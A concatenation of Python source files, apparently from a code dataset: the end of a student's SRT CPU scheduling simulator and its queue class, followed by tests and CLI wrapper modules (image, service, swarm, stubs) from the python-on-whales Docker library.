exit(0)
else:
self.process()
elif self.load_var > (len(self.load_time) - 2):
self.program_counter += p.duration
print("PC: " + str(self.program_counter))
self.printProcess(p)
self.load_var += 1
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
elif self.ready.count > 0 and p.duration > 0:
print("PC: " + str(self.program_counter))
p1 = self.ready.serve()
# self.ready.add(p1)
print(self.load_var)
if self.load_var <= (len(self.load_time) - 2) and self.program_counter < self.load_time[self.load_var + 1]:
if p1.duration == p.duration:
if p1.arrival < p.arrival:
self.ready.add(p)
# next_load = self.load_time[self.load_var]
self.program_counter -= p1.duration
p1.duration = 0
p1.start = self.program_counter
self.process()
# self.load_var += 1
if self.all[self.load_var].duration < p1.duration:
p = self.all[self.load_var]
self.ready.add(p)
self.ready.add(p1)
self.process()
else:
p = self.all[self.load_var]
self.ready.add(p)
self.program_counter += p1.duration
self.printProcess(p1)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
self.ready.add(p1)
next_load = self.load_time[self.load_var + 1]
p.duration -= next_load - self.program_counter
self.program_counter += next_load - self.program_counter
p.start = self.program_counter
self.load_var += 1
if self.all[self.load_var].duration < p.duration:
p1 = self.all[self.load_var]
self.ready.add(p)
self.ready.add(p1)
self.process()
else:
p1 = self.all[self.load_var]
self.ready.add(p1)
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
# print("1234")
self.ready.add(p1)
# self.ready.add(p1)
next_load = self.load_time[self.load_var + 1]
p.duration -= next_load - self.program_counter
p.start = self.program_counter
self.program_counter += next_load - self.program_counter
self.load_var += 1
if self.all[self.load_var].duration < p.duration:
p1 = self.all[self.load_var]
self.ready.add(p)
self.ready.add(p1)
self.finished += 1
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
p1 = self.all[self.load_var]
self.ready.add(p1)
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
elif self.load_var <= (len(self.load_time) - 2) and self.program_counter == self.load_time[
self.load_var + 1]:
p2 = self.all[self.load_var + 1]
if p.duration == p1.duration:
if p1.arrival >= p.arrival:
self.ready.add(p1)
if p2.duration < p.duration:
self.ready.add(p)
p = p2
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
self.ready.add(p2)
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
self.ready.add(p)
if p2.duration < p1.duration:
self.ready.add(p1)
p = p2
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
self.ready.add(p2)
p = p1
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
self.ready.add(p1)
if p2.duration < p.duration:
self.ready.add(p)
p = p2
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
self.ready.add(p2)
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
elif self.load_var <= (len(self.load_time) - 2) and self.program_counter > self.load_time[
self.load_var + 1]:
if p.duration == p1.duration:
if p.arrival <= p1.arrival:
self.ready.add(p1)
p.arrival = self.load_time[self.load_var]
self.program_counter += p.duration
print("PC: " + str(self.program_counter))
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
self.ready.add(p)
p1.start = self.program_counter
p1.arrival += p1.duration
self.program_counter += p1.duration
self.printProcess(p1)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
else:
# print("GM Holden")
self.ready.add(p1)
self.program_counter += p.duration
print("PC: " + str(self.program_counter))
p.arrival = self.load_time[self.load_var]
self.printProcess(p)
self.load_var += 1
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
elif self.load_var > (len(self.load_time) - 2):
if p.duration < p1.duration:
p.start = self.program_counter
self.ready.add(p1)
self.printProcess(p)
print("PC: " + str(self.program_counter))
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
elif p.duration > p1.duration:
self.ready.add(p)
p = p1
p.start = self.program_counter
self.printProcess(p)
# print("PC: " + str(self.program_counter))
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
'''
Displaying the statistics of this scheduling algorithm upon its completion.
'''
def stats(self):
self.averageT /= len(self.lines)
self.averageW /= len(self.lines)
print("Average waiting time: " + str(self.averageW))
print("Average Turnaround time: " + str(self.averageT))
self.throughput = len(self.lines) / self.averageT
print("Throughput: " + str(self.throughput))
'''
Displaying the data of the process upon its completion.
'''
def printProcess(self, p):
p.waiting += p.start - p.arrival
# self.program_counter += p.duration
p.turn += self.program_counter - p.start
p.duration = 0
self.averageT += p.turn
self.averageW += p.waiting
print("Process ID: " + p.name)
print("Waiting time: " + str(p.waiting))
print("Turnaround Time: " + str(p.turn))
self.finished += 1
def main():
print("SRT Scheduler\n")
SRT().run()
if __name__ == "__main__":
main()
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,812 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /queue.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/8/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
class Queue:
def __init__(self, size):
assert size > 0, "size should be positive"
self.the_array = [None] * size
self.front = 0
self.rear = 0
self.count = 0
def is_full(self):
return self.rear >= len(self.the_array)
def is_empty(self):
return self.count == 0
def reset(self):
self.front = 0
self.rear = 0
self.count = 0
def append(self, new_item):
assert not self.is_full(), "Queue is full"
self.the_array[self.rear] = new_item
self.rear = (self.rear + 1) % len(self.the_array)
self.count += 1
def serve(self):
assert not self.is_empty(), "Queue is empty"
item = self.the_array[self.front]
self.front = (self.front + 1) % len(self.the_array)
self.count -= 1
return item
def print(self):
index = self.front
for _ in range(self.count):
print(str(self.the_array[index]))
index = (index + 1) % len(self.the_array)
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,863 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_image.py | import pytest
from python_on_whales import DockerException, docker
from python_on_whales.components.image import ImageInspectResult
from python_on_whales.test_utils import random_name
def test_image_remove():
docker.image.pull("busybox:1", quiet=True)
docker.image.pull("busybox:1.32", quiet=True)
docker.image.remove(["busybox:1", "busybox:1.32"])
def test_image_save_load(tmp_path):
tar_file = tmp_path / "dodo.tar"
docker.image.pull("busybox:1", quiet=True)
docker.image.save("busybox:1", output=tar_file)
docker.image.remove("busybox:1")
assert docker.image.load(input=tar_file) == ["busybox:1"]
def test_save_iterator_bytes():
docker.image.pull("busybox:1", quiet=True)
iterator = docker.image.save("busybox:1")
for i, my_bytes in enumerate(iterator):
if i == 0:
assert len(my_bytes) != 0
assert i != 0
def test_save_iterator_bytes_fails():
docker.image.pull("busybox:1", quiet=True)
iterator = docker.image.save("busybox:42")
with pytest.raises(DockerException) as err:
for _ in iterator:
pass
assert "docker image save busybox:42" in str(err.value)
assert "Error response from daemon: reference does not exist" in str(err.value)
def test_save_iterator_bytes_and_load():
image_name = "busybox:1"
docker.image.pull(image_name, quiet=True)
iterator = docker.image.save(image_name)
my_tar_as_bytes = b"".join(iterator)
docker.image.remove(image_name)
loaded = docker.image.load(my_tar_as_bytes)
assert loaded == [image_name]
docker.image.inspect(image_name)
def test_save_iterator_bytes_and_load_from_iterator():
image_name = "busybox:1"
docker.image.pull(image_name, quiet=True)
iterator = docker.image.save(image_name)
assert docker.image.load(iterator) == [image_name]
docker.image.inspect(image_name)
def test_save_iterator_bytes_and_load_from_iterator_list_of_images():
images = ["busybox:1", "hello-world:latest"]
docker.image.pull(images[0], quiet=True)
docker.image.pull(images[1], quiet=True)
iterator = docker.image.save(images)
assert set(docker.image.load(iterator)) == set(images)
docker.image.inspect(images[0])
docker.image.inspect(images[1])
def test_image_list():
image_list = docker.image.list()
all_ids = [x.id for x in image_list]
all_ids_uniquified = set(all_ids)
assert len(set(all_ids_uniquified)) == len(image_list)
def test_image_bulk_reload():
pass
def test_image_list_tags():
image_name = "busybox:1"
docker.image.pull(image_name, quiet=True)
all_images = docker.image.list()
for image in all_images:
if image_name in image.repo_tags:
return
else:
raise ValueError("Tag not found in images.")
def test_pull_not_quiet():
try:
docker.image.remove("busybox:1")
except DockerException:
pass
image = docker.image.pull("busybox:1")
assert "busybox:1" in image.repo_tags
json_inspect_image = """
{
"Id": "sha256:db646a8f40875981809f754e28a3834e856727b12e7662dad573b6b243e3fba4",
"RepoTags": [
"progrium/stress:latest"
],
"RepoDigests": [
"progrium/stress@sha256:e34d56d60f5caae79333cee395aae93b74791d50e3841986420d23c2ee4697bf"
],
"Parent": "",
"Comment": "",
"Created": "2014-07-20T15:21:07.696497913Z",
"Container": "f13ba377a4cf8258bce8316ab24362500fa0dc28f9e03c80a1e14550efa0f009",
"ContainerConfig": {
"Hostname": "0e6756a12879",
"Domainname": "",
"User": "",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"HOME=/",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [
"/bin/sh",
"-c",
"#(nop) CMD []"
],
"Image": "8d2c32294d3876d8697bc10857397d6d515c1ed6942c8ae03e95e58684ae3a62",
"Volumes": null,
"WorkingDir": "",
"Entrypoint": [
"/usr/bin/stress",
"--verbose"
],
"OnBuild": [],
"Labels": null
},
"DockerVersion": "1.1.0",
"Author": "Jeff Lindsay <progrium@gmail.com>",
"Config": {
"Hostname": "0e6756a12879",
"Domainname": "",
"User": "",
"AttachStdin": false,
"AttachStdout": false,
"AttachStderr": false,
"Tty": false,
"OpenStdin": false,
"StdinOnce": false,
"Env": [
"HOME=/",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
],
"Cmd": [],
"Image": "8d2c32294d3876d8697bc10857397d6d515c1ed6942c8ae03e95e58684ae3a62",
"Volumes": null,
"WorkingDir": "",
"Entrypoint": [
"/usr/bin/stress",
"--verbose"
],
"OnBuild": [],
"Labels": null
},
"Architecture": "amd64",
"Os": "linux",
"Size": 281783943,
"VirtualSize": 281783943,
"GraphDriver": {
"Data": {
"LowerDir": "/var/lib/docker/overlay2/0f34a1116ce5fc3d2814ccd4ff6c5998467bf773b50dc1f3e9de8a3e26536dda/diff:/var/lib/docker/overlay2/ecd27b6e69106899a3fcc22faa764b73f605b857b694bcbea2b1df7da672477e/diff:/var/lib/docker/overlay2/79b527d6e8e3bd3b2a90de547eb8c65d74d10d3d5b4bf2a11b8880742b6dd9e8/diff:/var/lib/docker/overlay2/176ec1f59bf4e783d29fee797c90a0baa9acdb556a5718cde195783803e11e87/diff:/var/lib/docker/overlay2/672f340dc0780643d9e07d17969a0f4ad7ead31669b22a62e369c5b374c02193/diff:/var/lib/docker/overlay2/6d1272fb84716e0c5fc155a0ccfe53ac93ffa6ca5bba4ab78f380167a2b902de/diff:/var/lib/docker/overlay2/bf0acd30d8c5f43f6dce89e3e6201e3b74fccefdd025538c363e57058a8068c7/diff:/var/lib/docker/overlay2/ebaedc0f8f09e96821a6fba4878ade18ff50dabbb4fbe432fc665a06a382383b/diff:/var/lib/docker/overlay2/6d59c976356df2d5062f720e7a0dc0eab32e0c14f3386ab2704471fa91415283/diff",
"MergedDir": "/var/lib/docker/overlay2/62be51b0b523aa51710f777229bd396b7a5e11df274243d38d8a765f87041fc7/merged",
"UpperDir": "/var/lib/docker/overlay2/62be51b0b523aa51710f777229bd396b7a5e11df274243d38d8a765f87041fc7/diff",
"WorkDir": "/var/lib/docker/overlay2/62be51b0b523aa51710f777229bd396b7a5e11df274243d38d8a765f87041fc7/work"
},
"Name": "overlay2"
},
"RootFS": {
"Type": "layers",
"Layers": [
"sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef",
"sha256:8200f77c555bbcf7537cb9257f643a07adf179015d8c0789fd8ea42c269e78e7",
"sha256:5004946741d13ef6fba4d9dbc7e6ffde72f8ead31d569b32ca9593359312aa28",
"sha256:df60166f50feff0e4f9c52812b6012691489335d697fe73ee1bda664e0f180ca",
"sha256:eb9586760c19b22518d06d0b876dfd935ed6e1ac56c66dded1e613d74ce197f2",
"sha256:8744facfa470522aa3e2945cd3359ee2ef5a9d9f27366cbc1d12df17ac472e69",
"sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"sha256:1e47ff17b890c88095e57289a40b225e95272ea058dd1397436ab9e7d196b820",
"sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
]
},
"Metadata": {
"LastTagTime": "0001-01-01T00:00:00Z"
}
}
"""
def test_parse_inspect():
some_object = ImageInspectResult.parse_raw(json_inspect_image)
assert some_object.repo_tags == ["progrium/stress:latest"]
def test_copy_from_and_to(tmp_path):
my_image = docker.pull("busybox:1")
(tmp_path / "dodo.txt").write_text("Hello world!")
new_image_name = random_name()
my_image.copy_to(tmp_path / "dodo.txt", "/dada.txt", new_tag=new_image_name)
new_image_name = docker.image.inspect(new_image_name)
new_image_name.copy_from("/dada.txt", tmp_path / "dudu.txt")
assert (tmp_path / "dodo.txt").read_text() == (tmp_path / "dudu.txt").read_text()
def test_copy_from_and_to_directory(tmp_path):
my_image = docker.pull("busybox:1")
(tmp_path / "dodo.txt").write_text("Hello world!")
new_image_name = random_name()
my_image.copy_to(tmp_path, "/some_path", new_tag=new_image_name)
new_image_name = docker.image.inspect(new_image_name)
new_image_name.copy_from("/some_path", tmp_path / "some_path")
assert "Hello world!" == (tmp_path / "some_path" / "dodo.txt").read_text()
def test_many_images():
for tag in [
"ubuntu:16.04",
"ubuntu:18.04",
"ubuntu:20.04",
"busybox:1",
"traefik:v2.3.2",
"redis:alpine3.12",
"docker:19.03.13",
]:
docker.pull(tag)._get_inspect_result()
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,864 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/service.py | from datetime import datetime
from typing import Any, Dict, List, Optional, Union, overload
from python_on_whales.client_config import (
ClientConfig,
DockerCLICaller,
ReloadableObjectFromJson,
)
from python_on_whales.utils import DockerCamelModel, run, to_list
class Resources(DockerCamelModel):
limits: Dict[str, int]
reservations: Dict[str, int]
class ContainerSpec(DockerCamelModel):
image: str
labels: Dict[str, str]
privileges: Dict[str, Optional[str]]
stop_grace_period: int
isolation: str
env: Optional[List[str]]
class TaskTemplate(DockerCamelModel):
container_spec: ContainerSpec
resources: Resources
class ChangeConfig(DockerCamelModel):
parallelism: int
failure_action: str
monitor: int
max_failure_ratio: int
order: str
class ServiceSpec(DockerCamelModel):
name: str
labels: Dict[str, str]
mode: Dict[str, Any]
update_config: ChangeConfig
rollback_config: ChangeConfig
task_template: TaskTemplate
class ServiceInspectResult(DockerCamelModel):
ID: str
version: Dict[str, Any]
created_at: datetime
updated_at: datetime
spec: ServiceSpec
class Service(ReloadableObjectFromJson):
def __init__(
self, client_config: ClientConfig, reference: str, is_immutable_id=False
):
super().__init__(client_config, "ID", reference, is_immutable_id)
def _fetch_inspect_result_json(self, reference):
return run(self.docker_cmd + ["service", "inspect", reference])
def _parse_json_object(self, json_object: Dict[str, Any]) -> ServiceInspectResult:
return ServiceInspectResult.parse_obj(json_object)
@property
def id(self) -> str:
return self._get_immutable_id()
@property
def version(self) -> Dict[str, Any]:
return self._get_inspect_result().version
@property
def created_at(self) -> datetime:
return self._get_inspect_result().created_at
@property
def updated_at(self) -> datetime:
return self._get_inspect_result().updated_at
@property
def spec(self) -> ServiceSpec:
return self._get_inspect_result().spec
ValidService = Union[str, Service]
class ServiceCLI(DockerCLICaller):
def create(
self,
image: str,
command: Union[str, List[str], None],
):
"""Creates a Docker swarm service.
Consider using 'docker stack deploy' instead as it's idempotent and
easier to read for complex applications.
docker stack deploy is basically docker compose for swarm clusters.
# Arguments:
image: The image to use as the base for the service.
command: The command to execute in the container(s).
"""
full_cmd = self.docker_cmd + ["service", "create", "--quiet"]
full_cmd.append(image)
if command is not None:
for string in to_list(command):
full_cmd.append(string)
service_id = run(full_cmd)
return Service(self.client_config, service_id, is_immutable_id=True)
@overload
def inspect(self, x: str) -> Service:
pass
@overload
def inspect(self, x: List[str]) -> List[Service]:
...
def inspect(self, x: Union[str, List[str]]) -> Union[Service, List[Service]]:
"""Returns one or a list of `python_on_whales.Service` object(s)."""
if isinstance(x, str):
return Service(self.client_config, x)
else:
return [Service(self.client_config, a) for a in x]
def logs(self):
"""Not yet implemented"""
raise NotImplementedError
def list(self) -> List[Service]:
"""Returns the list of services
# Returns
A `List[python_on_whales.Services]`
"""
full_cmd = self.docker_cmd + ["service", "list", "--quiet"]
ids = run(full_cmd).splitlines()
return [Service(self.client_config, x) for x in ids]
def ps(self):
"""Not yet implemented"""
raise NotImplementedError
def remove(self, services: Union[ValidService, List[ValidService]]):
"""Removes a service
# Arguments
services: One or a list of services to remove.
"""
full_cmd = self.docker_cmd + ["service", "remove"]
for service in to_list(services):
full_cmd.append(service)
run(full_cmd)
def rollback(self):
"""Not yet implemented"""
raise NotImplementedError
def scale(self, new_scales: Dict[ValidService, int], detach=False):
"""Scale one or more services.
# Arguments
new_scales: Mapping between services and the desired scales. For example
you can provide `new_scale={"service1": 4, "service2": 8}`
detach: If True, does not wait for the services to converge and return
immediately.
"""
full_cmd = self.docker_cmd + ["service", "scale"]
full_cmd.add_flag("--detach", detach)
for service, new_scale in new_scales.items():
full_cmd.append(f"{str(service)}={new_scale}")
run(full_cmd, capture_stderr=False, capture_stdout=False)
def update(
self,
service: ValidService,
detach: bool = False,
force: bool = False,
image: Optional[str] = None,
with_registry_authentication: bool = False,
):
"""Update a service"""
full_cmd = self.docker_cmd + ["service", "update"]
full_cmd.add_flag("--force", force)
full_cmd.add_simple_arg("--image", image)
full_cmd.add_flag("--with-registry-auth", with_registry_authentication)
full_cmd.add_flag("--detach", detach)
full_cmd.append(service)
run(full_cmd, capture_stdout=False)
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,865 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/swarm.py | from typing import Optional
from python_on_whales.client_config import DockerCLICaller
from python_on_whales.utils import run
class SwarmCLI(DockerCLICaller):
def ca(self):
"""Not yet implemented"""
raise NotImplementedError
def init(
self,
advertise_address: Optional[str] = None,
autolock: bool = False,
availability: str = "active",
data_path_address: Optional[str] = None,
data_path_port: Optional[int] = None,
listen_address: Optional[str] = None,
) -> None:
"""Initialize a Swarm.
If you need the token to join the new swarm from another node,
use the [`docker.swarm.join_token`](#join_token) function.
A example of how to initialize the whole swarm without leaving the manager
if the manager has ssh access to the workers:
```python
from python_on_whales import docker, DockerClient
worker_docker = DockerClient(host="ssh://worker_linux_user@worker_hostname")
# Here the docker variable is connected to the local daemon
# worker_docker is a connected to the Docker daemon of the
# worker through ssh, useful to control it without login to the machine
# manually.
docker.swarm.init()
my_token = docker.swarm.join_token("worker") # you can set manager too
worker_docker.swarm.join("manager_hostname:2377", token=my_token)
```
# Arguments
advertise_address: Advertised address (format: `<ip|interface>[:port]`)
autolock: Enable manager autolocking (requiring an unlock key to start a
stopped manager)
availability: Availability of the node ("active"|"pause"|"drain")
data_path_address: Address or interface to use for data path
traffic (format is `<ip|interface>`)
"""
full_cmd = self.docker_cmd + ["swarm", "init"]
full_cmd.add_simple_arg("--advertise-addr", advertise_address)
full_cmd.add_flag("--autolock", autolock)
full_cmd.add_simple_arg("--availability", availability)
full_cmd.add_simple_arg("--data-path-addr", data_path_address)
full_cmd.add_simple_arg("--data-path-port", data_path_port)
full_cmd.add_simple_arg("--listen-addr", listen_address)
run(full_cmd)
def join(
self,
manager_address: str,
advertise_address: str = None,
availability: str = "active",
data_path_address: str = None,
listen_address: str = None,
token: str = None,
):
"""Joins a swarm
# Arguments
manager_address: The address of the swarm manager in the format `"{ip}:{port}"`
advertise_address: Advertised address (format: <ip|interface>[:port])
availability: Availability of the node
(`"active"`|`"pause"`|`"drain"`)
data_path_address: Address or interface to use for data
path traffic (format: <ip|interface>)
listen-address: Listen address (format: <ip|interface>[:port])
(default 0.0.0.0:2377)
token: Token for entry into the swarm, will determine if
the node enters the swarm as a manager or a worker.
"""
full_cmd = self.docker_cmd + ["swarm", "join"]
full_cmd.add_simple_arg("--advertise-addr", advertise_address)
full_cmd.add_simple_arg("--availability", availability)
full_cmd.add_simple_arg("--data-path-addr", data_path_address)
full_cmd.add_simple_arg("--listen-addr", listen_address)
full_cmd.add_simple_arg("--token", token)
full_cmd.append(manager_address)
run(full_cmd)
def join_token(self, node_type: str, rotate: bool = False) -> str:
"""Obtains a token to join the swarm
This token can then be used
with `docker.swarm.join("manager:2377", token=my_token)`.
# Arguments
node_type: `"manager"` or `"worker"`
rotate: Rotate join token
"""
full_cmd = self.docker_cmd + ["swarm", "join-token", "--quiet"]
full_cmd.add_flag("--rotate", rotate)
full_cmd.append(node_type)
return run(full_cmd)
def leave(self, force: bool = False) -> None:
"""Leave the swarm
# Arguments
force: Force this node to leave the swarm, ignoring warnings
"""
full_cmd = self.docker_cmd + ["swarm", "leave"]
full_cmd.add_flag("--force", force)
run(full_cmd)
def unlock(self):
"""Not yet implemented"""
raise NotImplementedError
def unlock_key(self):
"""Not yet implemented"""
raise NotImplementedError
def update(self):
"""Not yet implemented"""
raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,866 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/manifest.py | from python_on_whales.client_config import DockerCLICaller
class ManifestCLI(DockerCLICaller):
def annotate(self):
"""Not yet implemented"""
raise NotImplementedError
def create(self):
"""Not yet implemented"""
raise NotImplementedError
def inspect(self):
"""Not yet implemented"""
raise NotImplementedError
def push(self):
"""Not yet implemented"""
raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,867 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/context.py | from python_on_whales.client_config import DockerCLICaller
class ContextCLI(DockerCLICaller):
def create(self):
"""Not yet implemented"""
raise NotImplementedError
def export(self):
"""Not yet implemented"""
raise NotImplementedError
def import_(self):
"""Not yet implemented"""
raise NotImplementedError
def inspect(self):
"""Not yet implemented"""
raise NotImplementedError
def list(self):
"""Not yet implemented"""
raise NotImplementedError
def remove(self):
"""Not yet implemented"""
raise NotImplementedError
def update(self):
"""Not yet implemented"""
raise NotImplementedError
def use(self):
"""Not yet implemented"""
raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,868 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/test_utils.py | import random
import string
from contextlib import contextmanager
from python_on_whales import client_config
def random_name() -> str:
return "".join(random.choices(string.ascii_lowercase + string.digits, k=20))
@contextmanager
def set_cache_validity_period(x: float):
old = client_config.CACHE_VALIDITY_PERIOD
client_config.CACHE_VALIDITY_PERIOD = x
yield
client_config.CACHE_VALIDITY_PERIOD = old
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,869 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/config.py | from python_on_whales.client_config import DockerCLICaller
class ConfigCLI(DockerCLICaller):
def create(self):
"""Not yet implemented"""
raise NotImplementedError
def inspect(self):
"""Not yet implemented"""
raise NotImplementedError
def list(self):
"""Not yet implemented"""
raise NotImplementedError
def remove(self):
"""Not yet implemented"""
raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,870 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/trust.py | from python_on_whales.client_config import DockerCLICaller
class TrustCLI(DockerCLICaller):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.key = None
self.signer = None
def inspect(self):
"""Not yet implemented"""
raise NotImplementedError
def revoke(self):
"""Not yet implemented"""
raise NotImplementedError
def sign(self):
"""Not yet implemented"""
raise NotImplementedError
